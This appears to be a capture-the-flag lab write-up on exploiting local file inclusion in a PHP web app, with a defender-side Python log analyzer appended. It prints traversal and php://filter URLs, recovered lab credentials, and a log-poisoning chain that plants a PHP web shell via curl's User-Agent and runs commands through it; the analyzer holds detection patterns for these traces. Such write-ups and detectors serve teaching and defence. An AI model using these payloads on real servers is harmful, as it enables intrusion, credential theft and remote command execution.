[Day 6] Patch Management Is Hard

{Web Exploitation = LFI}

Challenge

Accessing the webserver returns the following.

Inspecting the URL revealed that the application was invoking the error message from a given file.

Deploy the attached VM and look around. What is the entry point for our web application?

  • err

Replacing the error file with /etc/passwd seemed to return the file and confirm the LFI vulnerability.

http://10.10.109.239/index.php?err=../../../../../etc/flag

Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

  • THM{d29e08941cf7fe41df55f1a7da6c****}

Next, to get the source code of a particular file, I used the PHP filter method as shown below.

http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php

Decoding the base64 value then led me to the next flag.

Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?

  • THM{791d43d46018a0d89361dbf60d5d****}

In the source code, I noticed that there are two other files referenced: creds.php and manage.php.

manage.php redirects to login.php. This is where the creds.php comes in handy. I used the same filter technique to read the contents of the creds.php file.

http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
<?php
// Contents of ./includes/creds.php as recovered through the filter
$USER = "McSkidy";
$PASS = "A0C315Aw3s0m";
?>

Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?

  • McSkidy:A0C315Aw3s0m

Logging into the Control System and accessing Password Recovery reveals the next flag.

Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

  • THM{552f313b52e3c3dbf5257d8c6db7****}

Now that I had access to the logs, knew where the log file was located, and was able to write to it via web requests, I used the log poisoning method to get remote command execution on the system.

http://10.10.103.198/logs.php

I first poisoned the logs by sending a request with curl and setting a PHP payload as the User-Agent, as shown below. Once the log is included through the LFI, the payload allows an attacker to run arbitrary commands remotely on the server via the browser.

curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.103.198/login.php

Following that, I included the log file via the LFI and simply added a cmd argument to the URL to run commands on the server.

http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname

The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

  • lfi-aoc-awesome-59aedca683fff9261263bb084880c965
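As an added, defender-side example that is not part of the original write-up, the following Python script parses Apache combined-format access log lines (constructed here, not the challenge's real log) and flags the traces this attack chain leaves behind: ../ traversal in query values, php:// wrappers, an include target ending in .log, and PHP tags written into the User-Agent or Referer header.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample log (combined format); IPs, timestamps and sizes are illustrative only.
SAMPLE_LOG = r"""
10.0.0.5 - - [06/Dec/2021:10:01:02 +0000] "GET /index.php?err=error.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2021:10:02:15 +0000] "GET /index.php?err=../../../../../etc/passwd HTTP/1.1" 200 1837 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2021:10:03:40 +0000] "GET /index.php?err=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2021:10:05:01 +0000] "GET /login.php HTTP/1.1" 200 300 "-" "<?php system($_GET[\"cmd\"]); ?>"
10.0.0.9 - - [06/Dec/2021:10:05:30 +0000] "GET /index.php?err=./includes/logs/app_access.log&cmd=ls HTTP/1.1" 200 9000 "-" "curl/7.68.0"
"""

# Apache "combined" format; escaped quotes inside the referer/user-agent fields are tolerated.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
WRAPPER_RE = re.compile(r'\b(?:php|expect|data|zip|phar)://', re.IGNORECASE)
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)

def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def indicators_for(entry):
    """List the LFI / log-poisoning indicators present in one parsed entry."""
    found = []
    # parse_qsl decodes once; the extra unquote also catches double-encoded values.
    values = [unquote(v) for _, v in parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True)]
    if any(TRAVERSAL_RE.search(v) for v in values):
        found.append("traversal")
    if any(WRAPPER_RE.search(v) for v in values):
        found.append("php_wrapper")
    if any(v.lower().endswith(".log") for v in values):
        found.append("log_file_include")   # include target is a log file: poisoning follow-up
    if PHP_TAG_RE.search(unquote(entry["referer"]) + " " + unquote(entry["ua"])):
        found.append("php_tag_in_header")  # PHP code planted in the log via a client header
    return found

def analyze(log_text):
    """Scan a whole log; return one finding per line that carries at least one indicator."""
    findings = []
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = indicators_for(entry)
        if hits:
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "target": entry["target"], "indicators": hits})
    return findings
```

Run against the constructed log it reports four of the five lines, and the php_tag_in_header hit on a request that otherwise looks benign (a plain GET to login.php) is the one that distinguishes poisoning from ordinary traversal probing.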
